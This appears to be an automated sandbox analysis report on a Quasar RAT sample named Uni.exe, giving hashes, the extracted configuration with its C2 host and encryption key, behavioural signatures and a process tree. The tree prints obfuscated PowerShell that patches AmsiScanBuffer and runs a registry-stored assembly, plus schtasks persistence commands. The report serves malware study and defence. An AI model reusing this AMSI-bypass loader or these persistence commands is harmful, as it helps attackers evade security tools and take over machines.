Analysis

  • max time kernel
    1800s
  • max time network
    1799s
  • platform
    windows11-21h2_x64
  • resource
    win11-20240419-en
  • resource tags

    arch:x64arch:x86image:win11-20240419-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    08-05-2024 17:28

General

  • Target

    Uni.exe

  • Size

    409KB

  • MD5

    7417c8c73e614f293152575f46134216

  • SHA1

    cc68f7f5e7c769efb5b3e06bfb3a2f9329f37805

  • SHA256

    00c7cb06bebe0da961155dc00f7ea7f96a3b04c89ae82408e7ece6968c91c3c3

  • SHA512

    897a859e609028157f2721d76b97497d4b9f821d2b8be3359d1192ddc3a83d4b7449db25c63c3c260067b796c122194c48747dc611c98dc1e33aab82a20b98b0

  • SSDEEP

    6144:nMr2pJAJcC0B632U3GRbMfgvKFFhTEDPX1NbKoEn5MSU+h2f8/14m:LpyJcC+82U3GRGGp1M5Ys2f8/6m

Malware Config

Extracted

Family

quasar

Version

3.1.5

Botnet

SLAVE

C2

even-lemon.gl.at.ply.gg:33587

Mutex

$Sxr-dOMA5C0pQTTpKjVsCp

Attributes
  • encryption_key

    UBXs44u6E81wxBGZxQHk

  • install_name

    $sxr-powershell.exe

  • log_directory

    $SXR-KEYLOGS

  • reconnect_delay

    3000

  • startup_key

    $sxr-powershell

  • subdirectory

    $sxr-seroxen2

Signatures

  • Quasar RAT

    Quasar is an open source Remote Access Tool.

  • Quasar payload 2 IoCs
  • Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 3 IoCs
  • Executes dropped EXE 3 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 17 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Checks processor information in registry 2 TTPs 7 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Enumerates system info in registry 2 TTPs 2 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of UnmapMainImage 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\system32\winlogon.exe
    winlogon.exe
    1⤵
      PID:648
      • C:\Windows\system32\dwm.exe
        "dwm.exe"
        2⤵
          PID:468
        • C:\Windows\System32\dllhost.exe
          C:\Windows\System32\dllhost.exe /Processid:{91cc552f-2970-45ae-b98d-b0f63d61b00c}
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1064
        • C:\Windows\System32\dllhost.exe
          C:\Windows\System32\dllhost.exe /Processid:{8ca49109-ba50-435e-8fef-5e0726e3aa54}
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          PID:1620
      • C:\Windows\system32\lsass.exe
        C:\Windows\system32\lsass.exe
        1⤵
          PID:704
        • C:\Windows\system32\svchost.exe
          C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
          1⤵
            PID:996
          • C:\Windows\System32\svchost.exe
            C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
            1⤵
              PID:924
            • C:\Windows\system32\svchost.exe
              C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
              1⤵
                PID:1044
              • C:\Windows\System32\svchost.exe
                C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                1⤵
                  PID:1088
                • C:\Windows\system32\svchost.exe
                  C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
                  1⤵
                    PID:1096
                  • C:\Windows\system32\svchost.exe
                    C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
                    1⤵
                      PID:1112
                    • C:\Windows\System32\svchost.exe
                      C:\Windows\System32\svchost.exe -k netprofm -p -s netprofm
                      1⤵
                        PID:1208
                      • C:\Windows\system32\svchost.exe
                        C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
                        1⤵
                          PID:1260
                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                            C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:jvJrOkAlRvYb{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$BkWOJaKONzPFeQ,[Parameter(Position=1)][Type]$JQZcYoiFZG)$BzILqWgpfrd=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+''+[Char](102)+'le'+[Char](99)+'t'+[Char](101)+'dDe'+'l'+''+'e'+''+[Char](103)+''+[Char](97)+''+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+''+[Char](110)+''+[Char](77)+''+[Char](101)+''+[Char](109)+''+'o'+''+'r'+''+[Char](121)+''+[Char](77)+''+[Char](111)+'du'+[Char](108)+''+[Char](101)+'',$False).DefineType(''+[Char](77)+''+[Char](121)+'D'+[Char](101)+''+[Char](108)+'eg'+[Char](97)+''+[Char](116)+'e'+'T'+''+[Char](121)+''+'p'+'e',''+[Char](67)+''+'l'+''+[Char](97)+''+[Char](115)+'s'+','+''+'P'+''+[Char](117)+'b'+[Char](108)+''+[Char](105)+''+[Char](99)+''+','+''+[Char](83)+''+'e'+''+[Char](97)+''+[Char](108)+''+'e'+''+[Char](100)+''+[Char](44)+''+[Char](65)+''+[Char](110)+'s'+[Char](105)+''+'C'+'l'+'a'+'s'+[Char](115)+''+[Char](44)+'Au'+[Char](116)+''+'o'+''+[Char](67)+''+'l'+''+[Char](97)+''+'s'+''+'s'+'',[MulticastDelegate]);$BzILqWgpfrd.DefineConstructor('R'+[Char](84)+''+[Char](83)+''+'p'+''+[Char](101)+'c'+[Char](105)+'alN'+[Char](97)+''+'m'+'e'+[Char](44)+''+[Char](72)+''+[Char](105)+''+'d'+''+[Char](101)+'B'+[Char](121)+''+[Char](83)+'i'+[Char](103)+',Pu'+'b'+'l'+'i'+''+'c'+'',[Reflection.CallingConventions]::Standard,$BkWOJaKONzPFeQ).SetImplementationFlags('R'+[Char](117)+''+'n'+''+[Char](116)+''+[Char](105)+''+[Char](109)+'e'+','+''+[Char](77)+'a'+[Char](110)+''+[Char](97)+'ge'+[Char](100)+'');$BzILqWgpfrd.DefineMethod('In'+[Char](118)+'ok'+[Char](101)+'',''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+'i'+'c'+''+[Char](44)+''+'H'+''+[Char](105)+''+'d'+''+[Char](101)+''+'B'+''+[Char](121)+'Sig'+[Char](44)+'N'+[Char](101)+'w'+[Char](83)+''+'l'+''+[Char](111)+''+[Char](116)+',Vi'+'r'+''+[Char](116)+''+[Char](117)+''+[Char](97)+''+'l'+'',$JQZcYoiFZG,$BkWOJaKONzPFeQ).SetImplementationFlags(''+[Char](82)+'u'+[Char](110)+''+'t'+''+'i'+''+'m'+''+'e'+''+[Char](44)+''+[Char](77)+'a'+[Char](110)+'a'+[Char](103)+''+[Char](101)+''+[Char](100)+'');Write-Output $BzILqWgpfrd.CreateType();}$CDwuGbYgUeUWw=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+[Char](115)+''+'t'+''+'e'+''+[Char](109)+''+[Char](46)+''+[Char](100)+''+[Char](108)+''+[Char](108)+'')}).GetType(''+'M'+''+[Char](105)+''+[Char](99)+'r'+[Char](111)+''+[Char](115)+''+[Char](111)+''+[Char](102)+''+[Char](116)+''+[Char](46)+''+'W'+''+'i'+''+'n'+''+[Char](51)+''+[Char](50)+''+[Char](46)+''+'U'+''+[Char](110)+''+[Char](115)+''+[Char](97)+''+[Char](102)+'e'+[Char](78)+''+'a'+'tiv'+'e'+''+'M'+''+[Char](101)+''+[Char](116)+''+[Char](104)+''+'o'+''+'d'+''+'s'+'');$yBqPGZzaTLMdLM=$CDwuGbYgUeUWw.GetMethod(''+[Char](71)+''+'e'+''+[Char](116)+''+[Char](80)+''+'r'+''+'o'+''+[Char](99)+'A'+'d'+''+[Char](100)+''+[Char](114)+'e'+[Char](115)+''+[Char](115)+'',[Reflection.BindingFlags]('P'+[Char](117)+''+'b'+''+[Char](108)+''+[Char](105)+''+'c'+''+[Char](44)+'S'+[Char](116)+'ati'+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$NlLPeaDCEyzGydzixeK=jvJrOkAlRvYb @([String])([IntPtr]);$GEwAUeEYkmlljimACBWRvh=jvJrOkAlRvYb @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$jBPkXzOKbuR=$CDwuGbYgUeUWw.GetMethod('G'+[Char](101)+''+[Char](116)+''+'M'+''+[Char](111)+''+'d'+''+[Char](117)+'l'+[Char](101)+''+'H'+''+'a'+''+[Char](110)+''+'d'+''+'l'+'e').Invoke($Null,@([Object]('k'+[Char](101)+''+[Char](114)+''+[Char](110)+''+'e'+''+'l'+'3'+[Char](50)+''+[Char](46)+''+[Char](100)+''+[Char](108)+''+[Char](108)+'')));$EwOlDlQJLqebhM=$yBqPGZzaTLMdLM.Invoke($Null,@([Object]$jBPkXzOKbuR,[Object](''+[Char](76)+''+[Char](111)+''+'a'+'d'+[Char](76)+''+'i'+''+'b'+'r'+[Char](97)+''+'r'+'yA')));$PVkuIELaeSRIXHkWn=$yBqPGZzaTLMdLM.Invoke($Null,@([Object]$jBPkXzOKbuR,[Object]('Vi'+[Char](114)+''+[Char](116)+'u'+[Char](97)+''+'l'+''+'P'+''+[Char](114)+''+[Char](111)+''+'t'+''+[Char](101)+''+[Char](99)+''+[Char](116)+'')));$JWBrrje=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($EwOlDlQJLqebhM,$NlLPeaDCEyzGydzixeK).Invoke('a'+'m'+''+[Char](115)+''+[Char](105)+'.'+[Char](100)+'l'+[Char](108)+'');$SyZHnVNxLPAPbPRyj=$yBqPGZzaTLMdLM.Invoke($Null,@([Object]$JWBrrje,[Object](''+'A'+'ms'+[Char](105)+''+'S'+'can'+[Char](66)+'u'+[Char](102)+''+'f'+''+[Char](101)+''+[Char](114)+'')));$FwSIleszYL=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($PVkuIELaeSRIXHkWn,$GEwAUeEYkmlljimACBWRvh).Invoke($SyZHnVNxLPAPbPRyj,[uint32]8,4,[ref]$FwSIleszYL);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$SyZHnVNxLPAPbPRyj,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($PVkuIELaeSRIXHkWn,$GEwAUeEYkmlljimACBWRvh).Invoke($SyZHnVNxLPAPbPRyj,[uint32]8,0x20,[ref]$FwSIleszYL);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+'O'+''+[Char](70)+''+'T'+''+[Char](87)+''+[Char](65)+''+[Char](82)+'E').GetValue(''+[Char](36)+''+[Char](55)+'7'+'s'+'t'+'a'+''+[Char](103)+''+[Char](101)+''+'r'+'')).EntryPoint.Invoke($Null,$Null)"
                            2⤵
                            • Suspicious use of NtCreateUserProcessOtherParentProcess
                            • Drops file in System32 directory
                            • Suspicious use of SetThreadContext
                            • Modifies data under HKEY_USERS
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of AdjustPrivilegeToken
                            • Suspicious use of WriteProcessMemory
                            PID:2228
                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                            C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:TfwzBxjQfhBJ{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$fhKfyIxYApuume,[Parameter(Position=1)][Type]$WkHeTWGSxm)$VVsKeWbvdJT=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('Ref'+[Char](108)+''+'e'+''+[Char](99)+''+[Char](116)+''+'e'+''+[Char](100)+''+'D'+''+'e'+''+[Char](108)+'eg'+'a'+''+'t'+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+'n'+'Me'+'m'+''+'o'+'r'+[Char](121)+''+[Char](77)+'o'+'d'+''+[Char](117)+'l'+[Char](101)+'',$False).DefineType('M'+'y'+'D'+[Char](101)+'l'+'e'+''+[Char](103)+''+[Char](97)+''+[Char](116)+''+[Char](101)+''+[Char](84)+''+[Char](121)+''+'p'+''+'e'+'',''+[Char](67)+'l'+[Char](97)+''+[Char](115)+'s'+','+''+[Char](80)+''+[Char](117)+''+'b'+'l'+'i'+''+'c'+''+','+''+[Char](83)+'e'+[Char](97)+''+'l'+''+'e'+''+[Char](100)+''+','+'A'+'n'+'si'+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+''+[Char](44)+''+[Char](65)+''+'u'+''+'t'+''+[Char](111)+''+'C'+'l'+'a'+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$VVsKeWbvdJT.DefineConstructor('R'+[Char](84)+''+[Char](83)+''+[Char](112)+''+'e'+''+[Char](99)+'i'+[Char](97)+''+[Char](108)+''+[Char](78)+''+'a'+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+'H'+''+'i'+'deBy'+[Char](83)+''+'i'+''+[Char](103)+','+[Char](80)+'u'+'b'+'l'+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$fhKfyIxYApuume).SetImplementationFlags(''+[Char](82)+'un'+'t'+''+[Char](105)+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](77)+'an'+[Char](97)+''+[Char](103)+''+[Char](101)+''+'d'+'');$VVsKeWbvdJT.DefineMethod(''+[Char](73)+'n'+[Char](118)+''+'o'+''+'k'+''+[Char](101)+'',''+'P'+'u'+[Char](98)+''+'l'+''+'i'+''+'c'+''+[Char](44)+''+'H'+''+'i'+''+'d'+''+[Char](101)+''+'B'+''+'y'+''+'S'+''+[Char](105)+''+[Char](103)+''+[Char](44)+''+'N'+''+[Char](101)+''+'w'+''+[Char](83)+''+[Char](108)+''+'o'+'t'+','+'V'+[Char](105)+''+[Char](114)+''+[Char](116)+''+[Char](117)+'a'+[Char](108)+'',$WkHeTWGSxm,$fhKfyIxYApuume).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+'n'+''+'t'+''+[Char](105)+'m'+[Char](101)+','+'M'+''+[Char](97)+''+[Char](110)+''+[Char](97)+'g'+'e'+''+[Char](100)+'');Write-Output $VVsKeWbvdJT.CreateType();}$iIDDERespHAcY=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+[Char](121)+''+[Char](115)+''+'t'+''+'e'+'m'+'.'+'d'+[Char](108)+''+[Char](108)+'')}).GetType(''+[Char](77)+''+'i'+'c'+[Char](114)+'o'+[Char](115)+''+[Char](111)+''+'f'+''+[Char](116)+''+[Char](46)+''+[Char](87)+'i'+[Char](110)+'3'+[Char](50)+''+[Char](46)+''+[Char](85)+''+[Char](110)+''+'s'+''+[Char](97)+''+'f'+''+[Char](101)+'N'+[Char](97)+''+[Char](116)+''+[Char](105)+''+'v'+''+[Char](101)+'M'+[Char](101)+''+'t'+'h'+[Char](111)+''+'d'+'s');$DXwTcILpyprJIy=$iIDDERespHAcY.GetMethod('G'+[Char](101)+''+[Char](116)+''+'P'+'r'+[Char](111)+''+'c'+'A'+[Char](100)+''+[Char](100)+''+[Char](114)+'e'+[Char](115)+''+[Char](115)+'',[Reflection.BindingFlags](''+'P'+''+[Char](117)+''+[Char](98)+''+[Char](108)+'i'+'c'+','+'S'+'t'+'a'+''+'t'+''+[Char](105)+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$nVYCYseHySOvCXbHGCj=TfwzBxjQfhBJ @([String])([IntPtr]);$wBxdtlRqHRBaTPRcarrDPh=TfwzBxjQfhBJ @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$ENrqunYTggf=$iIDDERespHAcY.GetMethod(''+[Char](71)+''+'e'+''+[Char](116)+''+[Char](77)+''+[Char](111)+''+[Char](100)+''+[Char](117)+''+[Char](108)+''+[Char](101)+''+'H'+''+[Char](97)+'n'+[Char](100)+''+'l'+''+[Char](101)+'').Invoke($Null,@([Object]('k'+[Char](101)+''+[Char](114)+''+[Char](110)+''+[Char](101)+''+[Char](108)+'3'+[Char](50)+''+'.'+''+[Char](100)+'l'+[Char](108)+'')));$gXLRinpzeadxXR=$DXwTcILpyprJIy.Invoke($Null,@([Object]$ENrqunYTggf,[Object](''+[Char](76)+''+'o'+''+[Char](97)+''+[Char](100)+''+[Char](76)+''+'i'+''+[Char](98)+''+[Char](114)+''+[Char](97)+'r'+'y'+''+[Char](65)+'')));$aPoAIqajrotnnsgKS=$DXwTcILpyprJIy.Invoke($Null,@([Object]$ENrqunYTggf,[Object]('V'+[Char](105)+''+[Char](114)+''+[Char](116)+'u'+[Char](97)+'lP'+'r'+'o'+'t'+''+[Char](101)+'c'+[Char](116)+'')));$hvHnSVe=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($gXLRinpzeadxXR,$nVYCYseHySOvCXbHGCj).Invoke('a'+'m'+''+'s'+''+'i'+''+[Char](46)+''+[Char](100)+'l'+'l'+'');$WSumNgWSqWsKmGAwu=$DXwTcILpyprJIy.Invoke($Null,@([Object]$hvHnSVe,[Object](''+[Char](65)+''+[Char](109)+''+[Char](115)+''+'i'+''+[Char](83)+''+[Char](99)+''+[Char](97)+''+[Char](110)+'B'+[Char](117)+''+'f'+''+[Char](102)+''+[Char](101)+''+[Char](114)+'')));$hoiGmLlDrf=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($aPoAIqajrotnnsgKS,$wBxdtlRqHRBaTPRcarrDPh).Invoke($WSumNgWSqWsKmGAwu,[uint32]8,4,[ref]$hoiGmLlDrf);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$WSumNgWSqWsKmGAwu,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($aPoAIqajrotnnsgKS,$wBxdtlRqHRBaTPRcarrDPh).Invoke($WSumNgWSqWsKmGAwu,[uint32]8,0x20,[ref]$hoiGmLlDrf);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+''+'O'+''+'F'+''+[Char](84)+''+'W'+''+[Char](65)+''+'R'+''+[Char](69)+'').GetValue(''+[Char](36)+''+[Char](55)+''+'7'+''+'s'+''+[Char](116)+''+[Char](97)+''+[Char](103)+''+'e'+''+'r'+'')).EntryPoint.Invoke($Null,$Null)"
                            2⤵
                            • Suspicious use of NtCreateUserProcessOtherParentProcess
                            • Drops file in System32 directory
                            • Suspicious use of SetThreadContext
                            • Modifies data under HKEY_USERS
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of AdjustPrivilegeToken
                            PID:5112
                            • C:\Windows\System32\Conhost.exe
                              \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              3⤵
                                PID:692
                          • C:\Windows\system32\svchost.exe
                            C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
                            1⤵
                              PID:1344
                            • C:\Windows\system32\svchost.exe
                              C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
                              1⤵
                                PID:1424
                              • C:\Windows\System32\svchost.exe
                                C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
                                1⤵
                                • Drops file in System32 directory
                                PID:1540
                              • C:\Windows\system32\svchost.exe
                                C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
                                1⤵
                                  PID:1552
                                  • C:\Windows\system32\sihost.exe
                                    sihost.exe
                                    2⤵
                                      PID:2036
                                  • C:\Windows\System32\svchost.exe
                                    C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
                                    1⤵
                                      PID:1592
                                    • C:\Windows\system32\svchost.exe
                                      C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
                                      1⤵
                                        PID:1600
                                      • C:\Windows\system32\svchost.exe
                                        C:\Windows\system32\svchost.exe -k NetworkService -p
                                        1⤵
                                          PID:1652
                                        • C:\Windows\system32\svchost.exe
                                          C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
                                          1⤵
                                            PID:1732
                                          • C:\Windows\System32\svchost.exe
                                            C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
                                            1⤵
                                              PID:1788
                                            • C:\Windows\system32\svchost.exe
                                              C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
                                              1⤵
                                                PID:1860
                                              • C:\Windows\System32\svchost.exe
                                                C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                1⤵
                                                  PID:1884
                                                • C:\Windows\system32\svchost.exe
                                                  C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                  1⤵
                                                    PID:1944
                                                  • C:\Windows\System32\svchost.exe
                                                    C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                    1⤵
                                                      PID:1948
                                                    • C:\Windows\system32\svchost.exe
                                                      C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
                                                      1⤵
                                                        PID:1052
                                                      • C:\Windows\System32\svchost.exe
                                                        C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
                                                        1⤵
                                                          PID:1184
                                                        • C:\Windows\System32\spoolsv.exe
                                                          C:\Windows\System32\spoolsv.exe
                                                          1⤵
                                                            PID:2180
                                                          • C:\Windows\System32\svchost.exe
                                                            C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
                                                            1⤵
                                                              PID:2348
                                                            • C:\Windows\System32\svchost.exe
                                                              C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
                                                              1⤵
                                                                PID:2396
                                                              • C:\Windows\system32\svchost.exe
                                                                C:\Windows\system32\svchost.exe -k NetworkService -p
                                                                1⤵
                                                                • Drops file in System32 directory
                                                                PID:2544
                                                              • C:\Windows\system32\svchost.exe
                                                                C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
                                                                1⤵
                                                                  PID:2556
                                                                • C:\Windows\system32\svchost.exe
                                                                  C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
                                                                  1⤵
                                                                    PID:2584
                                                                  • C:\Windows\sysmon.exe
                                                                    C:\Windows\sysmon.exe
                                                                    1⤵
                                                                      PID:2632
                                                                    • C:\Windows\system32\svchost.exe
                                                                      C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
                                                                      1⤵
                                                                        PID:2640
                                                                      • C:\Windows\System32\svchost.exe
                                                                        C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
                                                                        1⤵
                                                                          PID:2660
                                                                        • C:\Windows\system32\svchost.exe
                                                                          C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
                                                                          1⤵
                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                          PID:2680
                                                                        • C:\Windows\system32\svchost.exe
                                                                          C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
                                                                          1⤵
                                                                            PID:2692
                                                                          • C:\Windows\system32\svchost.exe
                                                                            C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
                                                                            1⤵
                                                                              PID:2328
                                                                            • C:\Windows\system32\wbem\unsecapp.exe
                                                                              C:\Windows\system32\wbem\unsecapp.exe -Embedding
                                                                              1⤵
                                                                                PID:3112
                                                                              • C:\Windows\Explorer.EXE
                                                                                C:\Windows\Explorer.EXE
                                                                                1⤵
                                                                                • Suspicious use of UnmapMainImage
                                                                                PID:3296
                                                                                • C:\Users\Admin\AppData\Local\Temp\Uni.exe
                                                                                  "C:\Users\Admin\AppData\Local\Temp\Uni.exe"
                                                                                  2⤵
                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                  • Suspicious use of WriteProcessMemory
                                                                                  PID:2012
                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                    "schtasks" /create /tn "$sxr-powershell" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\Uni.exe" /rl HIGHEST /f
                                                                                    3⤵
                                                                                    • Creates scheduled task(s)
                                                                                    PID:772
                                                                                  • C:\Users\Admin\AppData\Roaming\$sxr-seroxen2\$sxr-powershell.exe
                                                                                    "C:\Users\Admin\AppData\Roaming\$sxr-seroxen2\$sxr-powershell.exe"
                                                                                    3⤵
                                                                                    • Executes dropped EXE
                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                    • Suspicious use of WriteProcessMemory
                                                                                    PID:564
                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                      "schtasks" /create /tn "$sxr-powershell" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\$sxr-seroxen2\$sxr-powershell.exe" /rl HIGHEST /f
                                                                                      4⤵
                                                                                      • Creates scheduled task(s)
                                                                                      PID:3380
                                                                                    • C:\Users\Admin\AppData\Local\Temp\install.exe
                                                                                      "C:\Users\Admin\AppData\Local\Temp\install.exe"
                                                                                      4⤵
                                                                                      • Executes dropped EXE
                                                                                      PID:3684
                                                                                  • C:\Users\Admin\AppData\Local\Temp\install.exe
                                                                                    "C:\Users\Admin\AppData\Local\Temp\install.exe"
                                                                                    3⤵
                                                                                    • Executes dropped EXE
                                                                                    PID:3184
                                                                                  • C:\Windows\SysWOW64\SCHTASKS.exe
                                                                                    "SCHTASKS.exe" /create /tn "$77Uni.exe" /tr "'C:\Users\Admin\AppData\Local\Temp\Uni.exe'" /sc onlogon /rl HIGHEST
                                                                                    3⤵
                                                                                    • Creates scheduled task(s)
                                                                                    PID:4936
                                                                              • C:\Windows\system32\svchost.exe
                                                                                C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
                                                                                1⤵
                                                                                  PID:3452
                                                                                • C:\Windows\system32\svchost.exe
                                                                                  C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
                                                                                  1⤵
                                                                                    PID:3472
                                                                                  • C:\Windows\System32\RuntimeBroker.exe
                                                                                    C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                    1⤵
                                                                                      PID:3852
                                                                                    • C:\Windows\System32\RuntimeBroker.exe
                                                                                      C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                      1⤵
                                                                                      • Suspicious use of UnmapMainImage
                                                                                      PID:3944
                                                                                    • C:\Windows\system32\DllHost.exe
                                                                                      C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                      1⤵
                                                                                        PID:4008
                                                                                      • C:\Windows\system32\svchost.exe
                                                                                        C:\Windows\system32\svchost.exe -k UdkSvcGroup -s UdkUserSvc
                                                                                        1⤵
                                                                                          PID:4072
                                                                                        • C:\Windows\system32\svchost.exe
                                                                                          C:\Windows\system32\svchost.exe -k osprivacy -p -s camsvc
                                                                                          1⤵
                                                                                            PID:4336
                                                                                          • C:\Windows\system32\DllHost.exe
                                                                                            C:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}
                                                                                            1⤵
                                                                                              PID:4372
                                                                                            • C:\Windows\system32\SppExtComObj.exe
                                                                                              C:\Windows\system32\SppExtComObj.exe -Embedding
                                                                                              1⤵
                                                                                                PID:4232
                                                                                              • C:\Windows\System32\svchost.exe
                                                                                                C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
                                                                                                1⤵
                                                                                                  PID:3444
                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                  C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
                                                                                                  1⤵
                                                                                                    PID:3836
                                                                                                  • C:\Windows\System32\svchost.exe
                                                                                                    C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
                                                                                                    1⤵
                                                                                                      PID:1360
                                                                                                    • C:\Windows\system32\svchost.exe
                                                                                                      C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
                                                                                                      1⤵
                                                                                                      • Modifies data under HKEY_USERS
                                                                                                      PID:5044
                                                                                                    • C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
                                                                                                      "C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
                                                                                                      1⤵
                                                                                                      • Drops file in System32 directory
                                                                                                      • Modifies data under HKEY_USERS
                                                                                                      PID:1124
                                                                                                    • C:\Windows\system32\svchost.exe
                                                                                                      C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                                                                                                      1⤵
                                                                                                        PID:1328
                                                                                                      • C:\Windows\system32\DllHost.exe
